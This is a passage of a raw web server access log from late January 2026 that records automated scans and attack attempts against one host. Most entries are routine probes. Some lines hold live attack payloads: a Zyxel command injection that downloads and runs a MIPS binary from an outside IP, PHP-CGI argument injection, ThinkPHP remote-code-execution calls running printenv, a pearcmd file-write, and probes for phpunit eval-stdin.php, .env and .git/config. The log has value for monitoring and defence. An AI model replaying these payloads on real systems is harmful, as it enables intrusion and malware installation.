- GET http profibot.direct.quickconnect.to "/inputs.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/radio.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/404.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin.php?p=" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/footer.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/global.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/core.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/thoms.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/irc.js.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:34:24 +0000] 400 - GET http localhost "/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;" [Client 119.200.13.201] [Length 252] [Gzip -] "-" "-" +[29/Jan/2026:23:36:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:23:38:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:23:39:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:23:46:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:23:51:26 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[29/Jan/2026:23:51:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:23:52:47 +0000] 200 - GET http 91.82.215.191 "/" [Client 85.217.140.14] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)" "-" +[29/Jan/2026:23:52:47 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[29/Jan/2026:23:53:51 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[29/Jan/2026:23:59:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:00:08:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[30/Jan/2026:00:13:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:00:20:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:00:29:28 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 185.241.208.170] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.21 Safari/537.36 MMS/1.0.2531.0" "-" +[30/Jan/2026:00:37:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:00:37:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:00:51:06 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[30/Jan/2026:00:52:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:00:53:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[30/Jan/2026:01:00:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:01:07:58 +0000] 400 - GET http 91.82.215.191 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" +[30/Jan/2026:01:16:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 4.193.184.23] [Length 150] [Gzip -] "-" "-" +[30/Jan/2026:01:16:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/rip.php" [Client 4.193.184.23] [Length 150] [Gzip -] "-" "-" +[30/Jan/2026:01:18:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:01:18:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 176.65.132.5] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:01:22:07 +0000] 200 - GET http 91.82.215.191 "/" [Client 20.168.121.152] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[30/Jan/2026:01:28:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[30/Jan/2026:01:28:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:01:31:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:01:32:42 +0000] 400 - GET http 91.82.215.191 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[30/Jan/2026:01:32:59 +0000] 400 - GET http 91.82.215.191 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[30/Jan/2026:01:34:38 +0000] 400 - - http localhost "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:01:53:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:01:58:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:02:05:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 122.51.94.70] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[30/Jan/2026:02:09:54 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[30/Jan/2026:02:10:30 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[30/Jan/2026:02:11:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:02:13:54 +0000] 400 - GET http 91.82.215.191 "/" [Client 3.143.33.63] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[30/Jan/2026:02:18:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:02:20:50 +0000] 400 - - http localhost "-" [Client 3.143.33.63] [Length 0] [Gzip -] "-" "-" +[30/Jan/2026:02:21:03 +0000] 400 - - http localhost "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:02:22:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 44.224.207.235] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[30/Jan/2026:02:24:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:02:29:40 +0000] 404 - GET http 91.82.215.191 "/developmentserver/metadatauploader" [Client 20.65.193.90] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[30/Jan/2026:02:30:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[30/Jan/2026:02:40:48 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 117.164.191.217] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:02:40:51 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 117.164.191.217] [Length 154] [Gzip -] "-" "-" +[30/Jan/2026:02:40:53 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:40:58 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 117.164.191.217] [Length 154] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:00 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:05 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:11 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:16 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:21 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:25 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:31 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:37 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:39 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:41 +0000] 404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:46 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:50 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:52 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:41:57 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:02 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:04 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:05 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:06 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:06 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:07 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:02:42:10 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:14 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:17 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:19 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:25 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:31 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:37 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:44 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:51 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:54 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:42:58 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:02 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:03 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:08 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:09 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:11 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:11 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:13 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:13 +0000] 404 - GET http 91.82.215.191 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:18 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:21 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../tmp/index1" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:43:22 +0000] 404 - GET http 91.82.215.191 "/containers/json" [Client 117.164.191.217] [Length 150] [Gzip -] "libredtail-http" "-" +[30/Jan/2026:02:45:10 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 185.241.208.170] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; SM-N960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[30/Jan/2026:02:46:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 98.88.247.68] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[30/Jan/2026:02:46:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 98.88.247.68] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[30/Jan/2026:02:46:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 98.88.247.68] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:03 +0000] 200 - GET http 91.82.215.191 "/?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=printenv" [Client 98.88.247.68] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:04 +0000] 404 - GET http 91.82.215.191 "/index.php/module/action/param1/$%7B@print%28env%29%7D" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:04 +0000] 404 - POST http 91.82.215.191 "/_ignition/health-check" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:04 +0000] 404 - POST http 91.82.215.191 "/_ignition/execute-solution" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:04 +0000] 404 - GET http 91.82.215.191 "/__debug__/execute?cmd=printenv" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:04 +0000] 404 - GET http 91.82.215.191 "/script" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:05 +0000] 404 - GET http 91.82.215.191 "/actuator/env" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:05 +0000] 404 - GET http 91.82.215.191 "/env" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:05 +0000] 404 - GET http 91.82.215.191 "/v2/api-docs" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:05 +0000] 404 - GET http 91.82.215.191 "/api-docs" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:05 +0000] 404 - GET http 91.82.215.191 "/swagger.json" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:46:06 +0000] 404 - GET http 91.82.215.191 "/swagger/v1/swagger.json" [Client 98.88.247.68] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[30/Jan/2026:02:49:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:02:52:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[30/Jan/2026:02:54:24 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 146.70.116.221] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Scanner/1.0)" "-" +[30/Jan/2026:03:00:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:03:07:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:03:20:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:03:32:39 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[30/Jan/2026:03:33:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:03:39:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[30/Jan/2026:03:40:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[30/Jan/2026:03:40:28 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 2.57.171.148] [Length 122] [Gzip 1.35] "python-requests/2.26.0" "-" +[30/Jan/2026:03:40:29 +0000] 405 - POST http 91.82.215.191 "/" [Client 2.57.171.148] [Length 154] [Gzip -] "python-requests/2.26.0" "-" +[30/Jan/2026:03:46:25 +0000] 400 - GET http 91.82.215.191 "/" [Client 64.226.111.158] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[30/Jan/2026:03:47:25 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 134.199.149.147] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[30/Jan/2026:03:47:25 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 134.199.149.147] [Length 122] [Gzip 1.35] "Mozilla/5.0; 